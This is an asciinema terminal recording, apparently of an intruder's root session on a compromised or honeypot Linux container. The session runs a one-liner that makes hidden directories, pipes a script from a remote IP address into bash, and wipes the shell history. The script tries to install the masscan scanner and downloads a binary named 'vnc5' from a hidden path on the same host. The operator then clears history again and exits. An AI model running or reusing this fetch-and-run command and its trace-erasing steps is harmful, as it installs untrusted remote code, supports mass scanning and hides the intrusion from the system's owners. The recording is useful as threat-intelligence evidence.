{"version": 2, "width": 197, "height": 60, "timestamp": 1761335422, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.005225, "o", "\u001b[?2004hroot@0b057d8449b9:~# "]
[16.5678, "o", "\u001b[7mmkdir .cache; cd .cache; mkdir .a ;cd .a ;curl -s 196.251.116.58:8181/youngvnc | bash ; clear;clear; history -c\u001b[27m"]
[16.666991, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Cmkdir .cache; cd .cache; mkdir .a ;cd .a ;curl -s 196.251.116.58:8181/youngvnc | bash ; clear;clear; history -c\r\n\u001b[?2004l\r"]
[16.669991, "o", "mkdir: cannot create directory ‘.cache’: File exists\r\n"]
[16.672143, "o", "mkdir: cannot create directory ‘.a’: File exists\r\n"]
[17.069067, "o", "\rReading package lists... 0%\r"]
[17.175121, "o", "\rReading package lists... 0%\r"]
[17.263981, "o", "\rReading package lists... 35%\r"]
[17.26485, "o", "\rReading package lists... Done\r"]
[17.265325, "o", "\r\n"]
[17.269326, "o", "\u001b[1;31m"]
[17.269759, "o", "E"]
[17.270264, "o", ": \u001b[0mCould not get lock /var/lib/apt/lists/lock. It is held by process 714 (apt)\u001b[0m"]
[17.271279, "o", "\r\n\u001b[33mN: \u001b[0mBe aware that removing the lock file is not a solution and may break your system.\u001b[0m\r\n\u001b[1;31mE: \u001b[0mUnable to lock directory /var/lib/apt/lists/\u001b[0m\r\n"]
[17.272521, "o", "bash: line 3: yum: command not found"]
[17.273061, "o", "\r\n"]
[17.465441, "o", "\rReading package lists... 0%\r"]
[17.470343, "o", "\rReading package lists... 0%\r"]
[17.472224, "o", "\rReading package lists... 35%\r"]
[17.474736, "o", "\rReading package lists... Done\r"]
[17.564836, "o", "\r\n"]
[17.573966, "o", "\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 50%\r\rBuilding dependency tree... 50%\r\rBuilding dependency tree... Done\r\r\n\rReading state information... 0% \r"]
[17.57435, "o", "\rReading state information... 0%\r"]
[17.575162, "o", "\rReading state information... Done\r"]
[17.576069, "o", "\r\n"]
[17.66622, "o", "\u001b[1;31m"]
[17.666664, "o", "E"]
[17.667212, "o", ": "]
[17.668729, "o", "\u001b[0mUnable to locate package masscan"]
[17.668801, "o", "\u001b[0m\r\n"]
[17.669771, "o", "bash: line 4: yum: command not found"]
[17.670276, "o", "\r\n"]
[17.768582, "o", "\rReading package lists... 0%\r"]
[17.86518, "o", "\rReading package lists... 0%\r"]
[17.868861, "o", "\rReading package lists... 35%\r"]
[17.872453, "o", "\rReading package lists... Done\r"]
[17.873031, "o", "\r\n"]
[17.966304, "o", "\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 50%\r\rBuilding dependency tree... 50%\r"]
[17.967156, "o", "\rBuilding dependency tree... Done\r\r\n\rReading state information... 0% \r"]
[17.967207, "o", "\rReading state information... 0%\r"]
[17.96735, "o", "\rReading state information... Done\r\r\n"]
[17.968567, "o", "\u001b[1;31mE: \u001b[0mUnable to locate package libpcap-dev\u001b[0m\r\n"]
[17.970735, "o", "bash: line 5: yum: command not found\r\n"]
[18.980294, "o", "--2025-10-24 19:50:41--  http://196.251.116.58:8181/.rupemnasa/vnc5\r\nConnecting to 196.251.116.58:8181... "]
[18.994609, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[19.009954, "o", "200 OK\r\nLength: 3890308 (3.7M)\r\n"]
[19.064026, "o", "Saving to: ‘vnc5’\r\n\r\n\rvnc5                                                0%[                                                                                                           ]       0  --.-KB/s               "]
[19.194939, "o", "\rvnc5                                              100%[==========================================================================================================>]   3.71M  20.1MB/s    in 0.2s    \r\n\r\n2025-10-24 19:50:42 (20.1 MB/s) - ‘vnc5’ saved [3890308/3890308]\r\n\r\n"]
[22.269712, "o", "\u001b[H\u001b[2J\u001b[3J"]
[22.270526, "o", "\u001b[H\u001b[2J\u001b[3J"]
[22.270707, "o", "\u001b[?2004hroot@0b057d8449b9:~/.cache/.a# "]
[64.196045, "o", "h"]
[64.302814, "o", "i"]
[64.393787, "o", "s"]
[64.562215, "o", "tory "]
[64.683399, "o", "-"]
[64.792372, "o", "c"]
[64.898452, "o", "\r\n\u001b[?2004l\r"]
[64.898497, "o", "\u001b[?2004hroot@0b057d8449b9:~/.cache/.a# "]
[64.990841, "o", "e"]
[65.14482, "o", "x"]
[65.267284, "o", "i"]
[65.373287, "o", "t"]
[65.512349, "o", "\r\n\u001b[?2004l\r"]
[65.512393, "o", "exit\r\n"]
